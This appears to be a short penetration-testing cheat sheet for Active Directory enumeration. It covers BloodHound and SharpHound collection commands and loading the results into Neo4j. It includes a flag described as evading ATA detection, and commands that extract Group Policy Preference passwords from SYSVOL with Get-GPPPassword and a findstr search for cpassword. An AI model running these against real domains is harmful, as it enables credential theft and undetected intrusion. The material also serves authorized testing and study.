BloodHound Enumeration

BloodHound

Enable Sharp-Hound

Supply data to BloodHound

The generated archive can be uploaded to the BloodHound application.

Remote BloodHound

bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c All

On-Site BloodHound

#Using exe investor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>

.\SharpHound.exe  All
#Using PowerShell module investor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOn

To avoid detections like ATA

Invoke-BloodHound -CollectionMethod All -ExcludeDC

Neo4j

Start neo4j and BloodHound UI on kali machine and load the zip/json files

sudo neo4j start

this option (Local user) unavailable on win server 2016

#To show password # from powersploit 
Get-GPPPassword -Server PDC.wargrey.mon
#also to show password from sysvol in winServer2012 
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xml

Last updated